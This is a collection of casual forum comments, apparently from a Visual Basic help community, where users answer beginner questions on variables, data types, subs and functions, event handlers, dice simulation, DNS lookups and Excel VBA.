CurrentClockSpeed should give the actual real time clock speed. MaxClockSpeed should be the max the BIOS/CPU-driver/microcode/whatever thinks it can run at.
As far as I understand, there just isn't any easy way to get the *real* clock speed (including overclocking, power saving, turbo modes and whatnot) in a generic way. It requires complicated low level code and different CPUs/manufacturers need different approaches. If you really need this feature, you could take a look at Open Hardware Monitor. It's open source and (partially) written in C#, so you should be able to use their libraries or adapt it for VB.NET.
That'd be awesome thanks 
 Dim evalExpression As String = "2+8*3-7" Using myCalc As New DataTable Dim newCalculatedValue As Integer = CInt(myCalc.Compute(evalExpression, "")) Debug.WriteLine(newCalculatedValue) End Using
When you're assigning the week_1 - week_5, you're assigning the text value to a Double, which isn't a Double value, so it assigns 0 to it. You need to cast it to Double, preferably using `week_1 = Double.TryParse(week_1)` for each week. Other than that, it looks fine.
Your textboxes are names the same as your doubles. Rename the controls to something like txtWeek1 or something.
Open the file and read it in chunks. For each chunk of the file, you can check for the existence of the keyword, and if you find it you can abort reading any more. 
Thank you both! I'm still super new to coding.
A variable can change values; a constant cannot.
Use constants for values that will not change (and that you want the compiler to complain about if you try to change them). In your assignment, every given number (900$, 6%, 18%, 50%, etc) could be made a constant since they won't change during the calculations. All the other numbers will depend on sales amount and will be calculating accordingly. The values will vary, so for those you'll use variables. You could use variables for everything, but if you made a mistake in code and changed a percentage that was to be fixed, the code would go on and you'd have a bug. With constants, the compiler will refuse to compile and give you a "Constant cannot be the target of an assignment" error. 
[removed]
There are 4 main variable types, integer (whole number), double (number with decimal points), Boolean (True or false) and string (text(for a string whatever you assign to it must be in "")). To define a variable use "Dim Variablename As VariableType" To assign something to a variable you must do "Variablename = whatever" you can't assign a variable that you have not defined.
Here is an unnecessarily comprehensive list of data types: Boolean - true or false Date - a date... String - any characters Byte - positive integer from 0-255 Short - positive or negative integer up to 32,767 Integer - positive or negative integer up to approx. 2.15 billion Long - positive or negative integer up to 9.2x10^18 Single and Double are both decimal numbers with single giving around 45 digits of precision and double around 324. To assign a variable, use Dim [name] As [type] For a constant, use Const [name] As [type]
Variables store information, think of them as a container that can contain stuff. ' A simple variable Dim myVar as string myVar = "Bob" Console.Writeline(myVar) Console.readkey() ouput: Bob **Dim** tells the interpreter that you want to create a variable object, **as String** tells the interpreter you want to store the information in the variable as text. This is called the variable type. There is a short form for creating and setting a variable ' A shortened version of a simple variable Dim myVar as string = "Bob" Console.Writeline(myVar) Console.readkey() There are many different types, here is a short list and a link to the full list. String : 0 to approximately 2 billion Unicode characters Integer : -2,147,483,648 through 2,147,483,647 (signed) No decimal places, whole numbers only. Long : -9,223,372,036,854,775,808 through 9,223,372,036,854,775,807 (9.2...E+18 †) (signed) No decimal places, whole numbers only. Decimal : 0 through +/-79,228,162,514,264,337,593,543,950,335 (+/-7.9...E+28) † with no decimal point; 0 through +/-7.9228162514264337593543950335 with 28 places to the right of the decimal; Boolean : true or false. Can also be represented with 1 and 0. [.NET Data Types Summary](https://docs.microsoft.com/en-us/dotnet/visual-basic/language-reference/data-types/data-type-summary) Variable Array is a method to create many variables at once in a sequence. Dim myVar(3) as string = "" myVar(0)= "Blue" myVar(1)= "Red" myVar(2)= "Yellow" myVar(3)= "Green" Console.Writeline(myVar(2)) Console.readkey() output : Yellow Multidimensional Array is a method to create a 2 dimensional grid of variables. ' The first 1 represents the x or row, the second one represents the y or column. ' Remember arrays are zero based so when It says one it means 2 items in each dimension. Or a 2x2 box in excel. dim myVar(1,1) as String myVar(0,0) = "Blue myVar(1,0) = "Red" myVar(0,1) = "Car" myVar(1,1) = "Bike" Console.Writeline(myVar(0,1)) Console.readkey() output : Car There is a lot more depth too this, here is a great article to help you out. https://www.tutorialspoint.com/vb.net/vb.net_variables.htm 
Fuck me... Put this in paste in please? Nobody wants to read it when it is ALL ONE LINE
So the problem with using more than one die is that statistically speaking, if you roll more than one die is that you will get more fives than other numbers, with the heavier weights in the middle ( that is there are more ways to make 5,6 and 7 than there are 2 and 10. Here is what I am thinking. If you take the number 7 in binary it is 111. So if you roll one of the five sided dice and the top 2 are 1 and the bottom 2 are 0 ( and the middle is a throw out) then you should have an even change of each number showing up. So if you roll a 5 sided die for each bit, with 4 and 5 representing 1, 1 and 2 representing 0 and 3 representing roll again, you can create a 3 digit binary number that will have a value between 0 and 7. If you then throw out all the zeros (since you are looking for 1 to 7). that should leave you with an even spread of 1s to 7s. Way less code too. I ran a couple of tests of 100K iterations and each of the numbers were close to each other. 
Interesting solution. I had to try it. Module Module1 'Write A seven sided dice using only 5 sided die, use as many as you want Sub Main() Dim Results(8) As Double '8 because not using 0 Do For i = 1 To 100000 'number of rolls Results(Roll() * 4 + Roll() * 2 + Roll()) += 1 'convert binary roll results to 7 sided die face and increment count Next Console.WriteLine("Ones: " &amp; Results(1) &amp; " Twos: " &amp; Results(2) &amp; " Threes: " &amp; Results(3) &amp; " Fours: " &amp; Results(4) &amp; " Fives: " &amp; Results(5) &amp; " Sixes: " &amp; Results(6) &amp; " Sevens: " &amp; Results(7)) ' &amp; " Others: " &amp; Other) Console.ReadLine() Loop Until 1 &gt; 2 End Sub Function Roll() Do Roll = Int(Rnd() * 5) 'roll random value from 0 to 4 Loop Until Roll &lt; 2 'keep rolling until we get a 1 or 0 End Function End Module 
Thats an interesting way to handle the Roll() function. I wonder if that would be more efficient or if you could do a loop until Roll &lt;&gt;2, and then perform a if Roll &lt;2 then return 0 else return 1 I thought of this solution because the question was 5 and 7 sided dice, and there is no suck freakin thing. I couldn't figure out any other way to have multiple dice return even odds on each number.
A constant is something that WONT change eg. Your birthday A variable can be changed so use it for values that WILL change eg. Your age
The only difference is that a function can return a value and a procedure can't. Otherwise they are pretty much interchangeable. You can use a function like a procedure (just ignore the return value). There's technically nothing stopping you from only using functions. It just makes for confusing code - people reading your code will assume that a function will return a value that can (generally should) be used. If you always ignore that function return, then it really should be a procedure. Procedures can be used to "return" values through ByRef parameters, so it's also technically possible to never use a function at all. In summary, use the right tool for the job. If it needs to return a value, use a function. If it doesn't return a value, use a procedure.
Thank you so much! That's a good explanation. I'm going to try and fix my calculate button and report back.
Ah I understand. Thank you so much. 
https://paste.ubuntu.com/25748257/ this is what i have so far. 
A function returns a value a procedure does not. I use function almost exclusively. If the function has not relevant return value I will make it a Boolean and if the try catch fails return false and an instance of the error object. "bubbling" errors up this way is an easy way to identify where you issues are when the exe is in the users hands.
Just to clarify, there is nothing actually called a "procedure" in Visual Basic. There are functions and there are subroutines. I know that you are talking about subs when you say "procedure", but it is important to get naming correct in programming. For example, there are routines that can be run on SQL Server called "stored procedures", which execute code on SQL Server, but like functions, they can return values. So to avoid confusion on things, you should use "function" and "subroutine" (or sub for short) when describing these. What both functions AND subs are though, are **methods**. A method is either a function or a sub. 
Subs can also be passed values to be manipulated. Dim myValue as Integer = 9 Sub DoThisStuff() DoOtherStuff(MyValue) Msgbox(MyValue) End Sub Sub DoOtherStuff(byRef v as Integer) v += 1 End Sub At the end of the program, the value of MyValue is 10. It gets passed by reference to the second sub and changed in there. By reference basically passes a memory address instead of a value, so that whatever you do to the associated variable in the new sub, changes the original value of that variable, in this case, "MyValue". MyValue is disguised as v in the second sub, like he put on a costume and snuck in the back door. But it's really MyValue that gets changed. This can be confusing for beginning programmers, but it should be mentioned when discussing the differences in Subs and functions. You can get results back from a Sub just like you can with a Function. But your original value will be changed in the process. If it's data you needed, you should avoid this unless you know exactly what you're doing.
Here is a way to do it. Get seven five-sided dice, and number the dice 1 through 7. Roll seven five-sided dice, see which dice show the highest number, if the highest number is only on one die, that die wins. If there is a tie and two or more dice show the highest number, then reroll ONLY those dice. Repeat until only one die has the highest roll. Of course, if you are coding this in visual basic, you have an array, and you use the index to the array as the return value. Not to do your homework for you, but you will probably want a do Loop wrapped around a For next loop, and you will want an array to mark those dice that you are not going to reroll. I think you will need a counter. .. .. wait a minute. You can even go one step easier. Just do this. Set a flag to false. Start counting from one to seven. At each count, roll the five sided dice. If you roll a five, check that the flag has not been set to true. If it has, then reset the flag to false and start over from one. If it hasn't mark down the number you have counted to, set the flag to true, and keep counting. If you get to seven, and the flag hasn't been set to true (you never rolled a five) then start over from one. However, if you reach seven, the flag is set, then the number you wrote down is the answer. 
Thank you. Fixed
Throw away account cross posted. Nobody in the industry will answer these questions. What is this for HighSchool?
1. I'd rather not say, but it's in the field of logistics. 2. Also would rather not say. 3. Just a few months so far. 4. I am able to automate a lot of the processes that used to be done manually. 5. Currently, the majority of my work involves updating previously manual methods of reporting and processing data to be automatic. Once that portion of my task is complete, then I'll be able to innovate. 6. Currently I'm stuck with using VBA to process everything as it's built into the MS Office Suite which is installed on all our computers. I'm hoping to be able to convince IT to let me install VS2017 so I can use the .NET Framework. 7. Right now I'm still learning the ins and outs of everything that has to do with where I work. Once I become more familiar with how everything works together, I'll be able to improve processes that are involved with daily operations. 8. It's a unique challenge each day, so it's rarely monotonous. And I am free to tackle automating everything to my heart's content. 9. Not sure on what to offer for this question. I'd say just continue to learn and practice whatever programming language you decide to pick up. It's a skill that can continuously improve, and help you become more powerful in a programming environment. 10. The majority of my automation helps to improve my work load, but on top of that, I'm working on various projects that will easily save my coworkers hundreds of man hours per week. 11. Of course, I'd never have taken this job if I didn't like to solve problems.
4. I use VB to write tools that automate complex tasks previous done by operators using the manufactures tools. I write reporting software and apps that gather information from systems using SNMP and SOAP. I create database tables using MS SQL Server. 5. Problems? Never... The usual software development and testing. Aside from that, there is the first decision whether I'm going to innovate a solution using Windows Forms, or a Web Application. If it's something simple, Web app. If it is more complex or a requirement for better ergonomics, Windows Forms. 6. Visual Basic, MS SQL Server and MS IIS server. 7. Google. Don't let anyone degrade you because you use Google. 8. I love writing software, for me it's a form of art. You're composing music, oil painting, sculpture, poetry all in one. And with Visual Studio, there's very little you can't do. 9. It's not about the language, it's about the developer environment. Any language can get work done, but better development environments can do work faster, easier and with far less aggravation. Visual Studio. Period. Secondly, learn how to integrate with other systems, SOAP, SNMP, APIs for FTP, SSH, (de)compression. Eventually you're going to have to program to "Talk" to something. 10. I solve problems for other engineers, operations and customer service. 11. Yes, I live for it.
Or any other software 
Try either this : Application.OnTime Now + TimeValue("01:00"), ThisWorkbook.Name &amp; "Mail_Sheet_Outlook_Body()" Or put the code into a module instead.
I'll try this first thing in the morning then- Would I need to tweak the bottom 3 lines at all? 
No, the bottom three lines look like they would be called on workbook open, not the hour mark. The line of code I mentioned is what sets the timer to run the sub routine each hour. 
That didn't work, giving the same error message. Any ideas? 
Use exception handling 
I think the string manipulation would be a better approach for you to understand some basic programming techniques rather than just a quick solution that you probably don't understand. 
Did you try to make a If then decision statement?
Could you nest the keyPress event within the usTextBox,then set the your conditions for the usTextbox?
Right,...ok, is this a joke? You have the answer, just put it in the Label instead of the total minutes. Me.lblMinutesA.Text = leftover.ToString
You are trying the mathmatically compare a string. If you want to do it that way you have to put an entry in for each key you want to supress, it is very cumbersome. I would suggest using the keydown event and check for the ascii keycodes instead of the keypress event. Private Sub TextBox1_KeyDown(sender As Object, e As KeyEventArgs) Handles TextBox1.KeyDown ' 8 = Delete key ' 48 = 0 key ' 57 = 9 key ' you could put your msgbox where the supresskeypress is if you want. ' I would suggest it Is better to just cancel the key event. ' If e.KeyCode = 8 And e.KeyCode &gt;= 48 And e.KeyCode &lt;= 57 Then If e.KeyCode &gt;= 48 And e.KeyCode &lt;= 57 Or e.KeyCode = 8 Then ' left here in case you want to do somthing when those keys are pressed. ' For example when pressing ctrl 1 you place a constant value ' use the e.Modifiers to determine which special keys is pressed Else ' not anything we are looking for cancel the keypress e.SuppressKeyPress = True End If End Sub
Ah i didnt cath that my bad! Thanks for the help! 
I figured it out: I just needed to remove the Else. Now the only issue is getting it to display the results w/ 3 decimal places. I did put in a FormatNumber above the transfer to the convertedLabel, but my results don't look any different. Current code: https://pastebin.com/0Akh702a
Why is this same sub handling form loading, button false AND button true? You'll want to write different code depending on whether the user clicked on button false or button true. 
Ahh.. Okay.. Does that mean i'm going to have to store the questions in arrays then? Because those questions are only temporary currently right?
The sub you have right now is the code that will be run when the form first loads up. Your first part seems correct up to where you are looking for button clicks. You'll need to make two new subs: one that handles btnTrue.Click and one for btnFalse. The code in those subs will be executed when the buttons are clicked.
At work right now so can't test anything, but how about Private Sub btnTrue_Click(sender As Object, e As EventArgs) Handles btnTrue.Click Dim btnTrueClicked As Boolean = True End Sub Private Sub btnFalse_Click(sender As Object, e As EventArgs) Handles btnFalse.Click Dim btnFalseClicked As Boolean = True End Sub then having the booleans as global variables to be accessed in questions_load Is that all that needs to be done?! :O
Load is only called once. One possible solution is to create 5 variables each containing the answer for each question, and keep a counter that goes up every time one of the buttons is clicked to keep track of which question you are on. The better solution would be to keep these variables in an array of booleans, but if you're just beginning separate variables should be fine.
Hmmmm... I think I get what you're suggesting. Going to give it a go after work tomorrow. If I have any questions are you open for help? :D much appreciated mate
This is asking us to do it for you. You could have at least formatted it correctly. Please show your work so far and we might help.
The words "wall of text" are thrown around a lot these days.
did you just copy and paste your assignment
Something along these lines should work, if you have controls other than textboxes then you will need to add a gettype if statement to check it it’s a text box and remove the “as textbox” bit. Dim I as integer For each txtbx as textbox in form1.controls Array(I).text = txtbx.text I+=1 Next Sorry if code not exact I’m on mobile, but should get you started. 
Well couple of things: 1. TotalNumberofPieces = (Nothing), you need to have something there. 2. txtboxAveragePiecesPerPerson.Text = AveragePiecesPerPerson.ToString("C"), this should be txtboxAveragePiecesPerPerson.Text = AveragePiecesPerPerson.ToString() , OR just txtboxAveragePiecesPerPerson.Text = AveragePiecesPerPerson 3. Your equation for calculating AveragePiecesPerPerson makes no sense. I'm not sure how your suppose to calculate an avg. when the only data you're bringing into this subroutine is from ONE (1) employee. You certainly can't calculate out an average by adding PiecesCompleted + PricePaidperPiecesforallPieces then dividing by 2. Perhaps I'm misinterpreting your variable names.
Where it says totalnumberofpieces what should be their? Not sure how to calculate? any tips
There is no inherit built in method like there was in VB6. Now you have to create and array of textbox controls and position them on the form using the controls position properties. here is a simple example Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load Dim newTexbox(4) As TextBox Dim startHeight As Integer = 50 Dim startWidth As Integer = 100 For x = 0 To 4 Dim newBox As New TextBox newBox.Width = startWidth newBox.Left = 50 newBox.Top = startHeight newBox.Name = "TextBox" &amp; x newBox.Text = newBox.Name AddHandler newBox.TextChanged, AddressOf TextBox_TextChanged newTexbox(x) = newBox Me.Controls.Add(newBox) startHeight += 25 newBox.Show() Next End Sub Private Sub TextBox_TextChanged(sender As System.Object, e As System.EventArgs) Dim box As TextBox = DirectCast(sender, TextBox) Me.Text = box.Name &amp; ": " &amp; box.Text End Sub
not sure what you're asking. the type is probably the least important and most trivial part of this project. you've gone through some tutorials right? you can make a form that you click a button and it adds to a number?
i cant do the last part...
there's a "Learning" section in the sidebar with some links. you'll get a lot farther a lot faster by starting there.
Ideally you would structure your solution in a way where all the code that is shared between the toolbox and the modules lies in an independent third project that doesn't depend on the others. Then the startup project would only contain a little bit of code that initializes the toolbox and loads the child modules, and the child modules only depend on the shared project but not on the startup project. Another relatively simple way to get around circular dependencies is by using interfaces declared in a third project. 
You could add an event to the child project, and call the event when you need the parent to do something. The parent would just need to handle the event. 
I call this 'externalising business rules'. You want to execute a value as syntax on another value. Many out of box systems struggle with this. I've seen bespoke solutions that use python to parse the rules and write SQL that gets executed over the target data. I don't know if truly executing vales as syntax is possible in vb, if I had to do it I'd have to write something that analyses the statement to identify a predescribed pattern and use the values. Like you said, this isn't flexible to new patterns. Interested to know if anyone has a better solution. 
If the grammar is simple enough (two operators plus parentheses), writing your own basic parser isn't too hard. There are also various libraries like [Sprache](https://github.com/sprache/Sprache) that make this easier.
We aren't here to do your homework for you..
Where are you actually populating your combobox? You are adding new branches to a giant if-else structure. When you initialize the form, your selected index is going to be -1. In your If-else statement, it is going to check against all cases until it reaches the last “else”, every time you load the form. Every case you add will add an additional comparison case to that combobox. I’m guessing we’re at almost 1,000 species now? Every lookup is going to go through all your cases until they reach a match. The further down the list, the more cases to evaluate, and the slower it gets. I use a database for stuff like this. You might even get better performance out of a dictionary or other collection class. 
- Homework questions are tolerated, please be specific about the question as much a possible. Asking us to write it for you is not going to happen. We also reserve the right to not answer if we think you are just not trying. - Tell us what you have tried, to help us give better answers?
Thanks I will check that out
Thanks, I am teaching myself programming and can usually find what I need with a google search or two but I haven't been able to find much on this
No I have the code I'll post it 
I'm kinda new to Reddit still trying to figure it out I tried to post the code last night right after the first post but it said I was doing too much 
I'm supposed to enter a value while the product is less than 1000. You don't have to solve it (I would rather just point me in the right direction so I can actually learn) but any tips and tricks or a different way to think about it would be much appreciated.
I just figured it out :P
As far as looking up records, there's a free api for Visual Studio that I found and use at work. I'll comment the name and URL tomorrow. As far as adding and removing: I'm a little confused by that. I can only imagine that you need to add static DNS entries of non-windows hosts into AD/DDNS. Right? Because windows computers just register themselves...unless your domain replication is not set up for it,...or your DNS is not AD integrated. Surely this is a last century problem.
Do you mean somthing like gethostentry? https://msdn.microsoft.com/en-us/library/ms143998.aspx
Probably the number of pieces completed by that one person I would assume.
That call will use the DNS servers configured on the machine. It sounds like he wants to do an NSLOOKUP on other DNS servers without having to change the network configuration.
When I build a program containing multiple/identical (or nearly identical) objects I use an object array. That way you can share code for common functions like mouse-over/colour changes and still identify each object when required by its array index. 
Hmm... I'm incredibly knew to programming so this might be difficult to wrap my head around but i'll try it. Thanks!
Here's the API I use. http://simpledns.com/dns-client-lib.aspx 
Use the same event handler for MouseEnter, MouseLeave on all the buttons. You just have to have a global variable to remember the previous button to set it back to blue. Totally untested: Private Sub Button4_MouseEnter(sender As Object, e As EventArgs) Handles Button1.MouseEnter, Button2.MouseEnter, Button3.MouseEnter, Button4.MouseEnter, Button5.MouseEnter Dim B As Button = sender PrevButton.BackColor = Color.Gray PrevButton = B B.BackColor = Color.Blue 'Select Case B.Text Select Case B.Name 'Case Is = "1" 'Case Is = "2" 'Case Is = "3" 'Case Is = "4" 'Case Is = "5" Case Is = "Button1" ' Do something special based on particular button. Case Is = "Button2" Case Is = "Button3" Case Is = "Button4" Case Is = "Button5" End Select End Sub 
I think what you want to do is create a class for the code. 
You're either looking for a class or a function/sub.
I haven't been 100% clear my apologies. I want to manage Windows Server DNS server programmatically. 
I guess you have to hide the wrong ones yourself depending on which tab is active. VB.NET has a groupbox as container which you can use. If VBA has something similar put all the controls for each tab in a different container and then hide the container.
I wanted to develop the software using Visual Studio, since I am more confortable with it, but I am limited on what software I can install on company computers. Not to mention that I haven't touched VB since high school. But thank you for your help. :)
if you really want to reinvent using a database server or a web server, you use TCP sockets. the common example is a simple "chat" app. the better way is to install IIS and make an asp.net script to accept a POST and store the data. then you can use Invoke-WebRequest from your current powershell 
Thanks mate, trying it right now i'll get back to you
When I hover over one of the buttons it crashes :(
When I hover over B it tells me it's only equal to the first button :o
https://www.tutorialspoint.com/vb.net/vb.net_print_dialog.htm
Let's see the code.
Thanks for this site, but it seems to just be printing out a blank piece of paper. I think I'm missing something out but not sure what
First you need to save form as screenshot. https://stackoverflow.com/questions/22676601/save-form-as-image-screenshot Then print it out https://bytes.com/topic/visual-basic-net/answers/362421-printing-png-file-any-image-file
I think you're correct. It's been years since I used VB6, and even long er since VBA, but I think the tab strip is just a UI component, and doesn't actually have multiple containers. IIRC, you have to hide / show everything by hand on the click event (figuring out which tab is active), and code it your self. As suggested, some kind of container for each tab (a frame maybe?) is helpful since you can hide the entire container with a single line of code. 
Yes. Since the VB compiler is part of the .NET framework, it's installed on every machine that runs your code. It's not what I'd call beginner material, but it can definitely be done. I use it to add scripts to our report engine, so that a user can write a custom script in VB.NET or C#, and can modify the report data at run time. So the way it works, is that you can create classes from a string that contains the code, and then compile them into an assembly (in memory or on disk) and then call functions or sub routines in the classes. In order to interact with them, you have to create an Interface for the class to implement, so that your code knows how to interact before the class is created. Then you create a codeDomCompiler instance, and pass it your code to compile. It returns a reference to the new assembly that you can then interact with. There are a few minor inconveniences to deal with, the most notable being the fact that the new assembly doesn't inherit any project level dependencies, so you have to specify pretty much all of the dependencies that the assembly needs in the code. The following article outlines a simple example of the concept. https://blogs.msmvps.com/joacim/2009/06/15/using-the-codedom-to-do-scripting-with-net/
I think you didnt drag in correctly. 
Or do you? https://msdn.microsoft.com/en-us/library/microsoft.visualbasic.powerpacks.printing.printform.aspx?f=255&amp;MSPPError=-2147217396
One of my favorite programming things is databases. Get yourself a copy of SQL Express or (even better) MY SQL. If you want run the MYSQL on a server, which you can run in a VM using Oracle's Virtualbox. Then make a program that accesses the database and presents the data. So many fun and interesting things. For bonus points write a web based front and as well. For the program itself, why not write a program that keeps track of a vehicle inventory of a transportation service. You would have to keep track of the drivers, where they drove, what vehicle they drove, What good they moved, and you could keep track of their hours and mileage and gas consumption, so many things.
Wow! Those are both two great ideas. Luckily for me I am doing SQL in school this term so I'll leave that for school and I'll get to work on the Visual Basic idea. Thank you so much :D
TIL
For the transportation service. Where should I start?
Ok
It's not, actually. But it's alright. Nobody cares.
I can agree with you, vs is such a massive headache
If you posted a solution, shouldn't it be in your post history? Hopefully you can find it that way, though who knows if the same fix would still work?
VS works just fine, especially the last 2 versions. 
It was a couple years ago. That's a lot of posts to go through. 
Your experience may vary.
I think you said you didn't want to do the SQL part now right? Without an underlying database there's not really much you can do with the project that I suggested.
Ohhh, okay. My bad 
No worries. It's just in a project like this, you have to have the data structures in place before you start coding, other wise it's going to be very difficult to manage. So since you don't want to do a data project right now, why not look at some arduino stuff? It's pretty cheap to get some hardware and you can have lots of fun with it. You can program them to do all kinds of things.
Arduino? Are they similar to Raspberry Pi's or something different? 
a raspberry pi is a tiny computer. The arduino is a controller. The arduino doesn't have a video out or usb ports (except for the programming port) and you connect an arduino to your computer to program it. have a look here: https://www.arduino.cc/ You can buy kits on amazon for 25 bucks or so that have a whole bunch of fun projects and things to do with it.
How so? Install Windows 10, install VS 2017 Community.....done and done. 
&gt; Install Windows 10 Nah.
Let me tell you my experience: I was new to IT course and needed to use VS to complete my homework and having a hard time using it. Few days before due date I figured out it needed to be installed in the same drive as system drive(it never tells me during installation). Okay maybe u will dismiss me as moron but there are more: It never debug and build successfully with one click, always give me few error messages in first few clicks, then only work properly after that. So it goes like that: When using netbean for java I click: start-run successfully! When using vs I click: start-error-ok-start-catastrophic error-ok-start-no respond-start-run successfully! And sometimes I have to go and delete the two folders in the project folder to let me rebuild again. And countless errors. So yeah, using VS is about 80% of the time trying to figuring out what is wrong again with this Microsoft software and 20% actually working on the project
Poor you. Probably struggling with Linux or that POS abandonware that's Mac OS.
Have you actually googled? I googled 'CPU clock VB.net' and first hit was https://stackoverflow.com/questions/33789321/get-cpu-name-architecture-and-clock-speed-in-vb
The reason you have no templates is that you have to select them during the install process you can go back into the visual studio installer and select them to install them. **"File-&gt;New-&gt;Project then go to Open Visual Studio Installer on the left Bottom,then once the installer is opened close Visual Studio and then on the installer screen go to the .NET Desktop Development and the click Install or Modify Button."** If you are taking this a sign to move on please do. I would recommend Python and Atom. Once you realize that most other distribution IDE's are worst than Visual Studio let us know.
Windows 7, actually. And an apparently failing SATA drive.
Is there a separate area for specifically choosing the templates in the installer? As in, "Click here to select the packages you want: C++, VB, C#, Unity compatibility, etc.... But click DOWN HERE to add the templates for these packages!" If so, then I messed up. If not, then the problem is with VS.
"It's a poor craftsman that blames his tools" 
I would check to see if the "Startup Form:" is set in the project properties. https://imgur.com/Tyqg9St 
Could you send a link
No sorry, I havent uploaded the game anywhere
I doubt winzip is the issue. It's possible this program uses a framework version that is different than the other users. Also if you are using a different OS than the other users are, that could cause issues. Finally, I have seen issues where your date format, region is different than other computers, and it's causing problems. None of these problems are normally associated with error 62, but what error 62 does (and this is in VB6), it's reading in a file and tries to read data after all the data has been read. As a test, I would have one of your other users send you an unzipped dataset and then use that in the program, that will deterine if winzip is the problem or not, but I can almost guarantee it's not
If only I had tools to blame. 
Assume all variables are declared 
Try this: For i As Integer = 0 To 2 If myButtons(i).Tag = "" Then BtnO(myButtons(i)) Exit For End If Next i
As with anything else on here, post the code so we can see what you have. 
Add orderTotal at the bottom. OrderTotal = orderTotal + itemAmount You have thus declared outside a function so this will keep the value as you add items to the checkout. 
I don't have any code for this atm. To be honest I don't even know where to start with this part.
Alright. I figured out that I needed to use "SaveSetting" and "GetSetting". How do I create an array so it always selects the next in line whenever I start over?
First, I'd try to eliminate Winzip as a possible problem. Unzip the files on your PC and on one of your colleague's and use something like "md5sum" to compute hashes for the unzipped files and make sure they are identical. You could also copy over the entire WinZip folder (and maybe registry entries) from a colleague's machine and run the exact same version. 2nd, check the regional settings on your PC vs someone where it works. Your date format might be different and the program might be filtering on dates and not interpreting them correctly, resulting in a zero length file (guaranteeing an error 62 when you try to read from it in a further step...). Make sure the number and currency formats are also identical. 3rd, but not very likely (error would be different), make sure the file, folder and shares (if any) permissions are correct. You can use the "icacls.exe" Windows utility to list permissions from files and folders. Compare those with a working PC. If all that fails, you'll probably need to figure out how to get the source code back. If a colleague developed it while working at your company, normally the company owns the source code. It's possible to further investigate the problem using tools like procmon, debuggers and similar, but the knowledge and effort required probably exceed the work of rewriting the process from scratch. As a final solution, you could clone a colleague's PC to run in a VM and use that for that particular job, but it's a bit of a hassle. 
 Dim myButtons = {Button1, Button2, Button3} For btn = myButtons{1 to 3} can be done by Dim myButtons = {Button1, Button2, Button3} For each btn in myButtons
I tried that, but there is nothing to change about the form. There is only one option for Startup Form. 
You're really looking for a miracle here aren't you? Ok, I'll guess that you are looking for "Stack." https://msdn.microsoft.com/en-us/library/system.collections.stack(v=vs.110).aspx 
I've been struggling all morning. I don't even remember what I was trying to do anymore.
**What is a .prx file? What does it contain? What does the data look like?** I'm going to guess. I guess that your files are created with truncated(shorter) record at the end. I guess that something is wrong or different with the last record in your files than you coworkers files. Is there any way that you can use a .prx file that your coworker created without it being over written by the whole process?
I hear ya, all Mondays are like that for me. How long is the code you have? Can you paste it into a post here?
It's not that big, I think. Gimme a sec and I'll post it. it might hurt your eyes tho. It's an absolute mess.
Apparently it's too big. I don't remember any site I can paste it and paste the link here. Do you have any recommendation?
Ok, I have it. That's a lot of textboxes. ;-) So, this is VBA.
I think if I had to do something like this, I might try to use custom properties to save the range and date things. That way it would by hidden from the user and still embedded in the sheet. ActiveSheet.CustomProperties.Add "TheName", "1.3" Dim CP As CustomProperty Set CP = ActiveSheet.CustomProperties("TheName") Debug.Print CP.Value 
Yes. I forgot to mention that in the title. Sorry. :\
Thanks for the in depth answer! I'll be playing around with this, seeing if I can figure it out. 
Comment out the code in your Load event and see if the form appears. If so, you know where the problem is. Keep narrowing it down until you find what's preventing it from loading.
pseudo-code: string = "" if A checked then string = string &amp; "test1, " if B checked then string = string &amp; "test2, " etc. then you need to remove the trailing comma textbox text = string 
Appreciate it!
Why can't you use arrays? Since a string is essentially an array of characters, why can't you take the string, replace all the spaces with nothing (i.e. ""), and then get a count on the result? That'd at least give you the number of characters.
Sorry, I should've explained that. Arrays are in the next chapter and the instructor doesn't want us to use things we have gone over yet. And I have the letter counter already, I am just struggling with the word counter.
Ooooh OK. Fair enough. I actually got in trouble in a non-imperative class in college (I think we were doing either Scheme or Prolog at the time, I don't remember which) for jumping ahead to use a method we hadn't learned yet. The prof was an asshole though so nothing came of it. Anyway, an easy way would be that as you loop through each letter in the sentence and when you find a space, increment a counter by 1. At the end, the number of words is counter + 1 (because you always have one more word than spaces.
Right. Like I have the logic for it pretty sound, as far as needing to identify characters until it hits a space, I just don't know how to implement that into the code.
Can you share what you have?
If I can figure out how to upload it to imgur I'll be more than happy to.
Use pastebin.com
https://imgur.com/a/d1yK1 This should be it.
you are a life saver!
I remembered something. Since I'm already using the GUI to input data into my Excel sheets, is there any kind of function or something like that, that I can use to get the info from the lastest row? Because that would be a great help.
Can u use find and replace?
Bit of Pseudo loop through string if current_letter = space_character then spaces = spaces + 1 else letter_count = letter_count + 1 Number of words = number of spaces + 1
Sorry mate forgot to get back to you... I figured it out not long after that, forgot to add the mouseleave as well as just mouseenter thanks so much for ur help :)
What do you mean by that?
As far as the letter count goes I see how that would work, but for the word count I’m not too sure. For instance, if there was three spaces then a letter, it would throw that there were four words.
&gt; from the lastest row Sounds like you want something like this: Sub GoToLastAndSelectRow() ActiveCell.End(xlDown).EntireRow.Select End Sub 
So, that's only going to work if there's NO BLANKS in the column of data. Otherwise you could try using ".UsedRange"
Try oDoc = oWord.Documents.Add(*insert template path*) and eliminate the oDoc = oWord.Documents.Add line. That should set the oDoc variable to a newly created document that is based on the template you've specified in the path. 
Changed it to link it to my Word Template still doing the same. Creating new documents each time. Edit: Nevermind finally got it running apparently it DOES create new documents each time when i use templates but this time i can fill out the bookmarks now.
Found the problem; it's Visual Studios. Downloading the 2017 version made things run. 
I'm not sure what you are trying here exactly but everytime you call SendToTop you empty the textbox and then you are trying to check if it contains a "+" ? Of course nothing will happen because it is empty.
Skip down another 2 pages to the "Adding control to Visual Studio toolbar" section. Add the control to the toolbox, then you can just add it to the code as simple as a button.
it works, thx
I've been using 2013 pro for quite a while now. Works on Windows 10 Fall Creators as well. Is this a company machine? Perhaps a protocol has been disabled or online restrictions have been put in place? Have you tried reinstalling?
You could use a boolean variable to ignore consecutive spaces. Public Sub Main() Dim sentence As String = "The quick brown fox jumps over the lazy dog." Console.WriteLine(GetWords(sentence)) End Sub Public Function GetWords(sentence As String) As Integer Dim WordCount As Integer = 0 Dim Separator As Boolean = False For Each letter As String In sentence If letter = " " And Separator = False Then WordCount += 1 Separator = True Else If letter &lt;&gt; " " Then Separator = False End If Next ' Final word. May need changes for sentences with spaces at the end WordCount += 1 Return WordCount End Function
Glad I could help, and thanks for coming back to let me know it worked!
I got it eventually, did not require my own function at all to do it lol
You could dump the outcomes to a text box and keep track of the loops with an integer you increment every loop. What have you got so far?
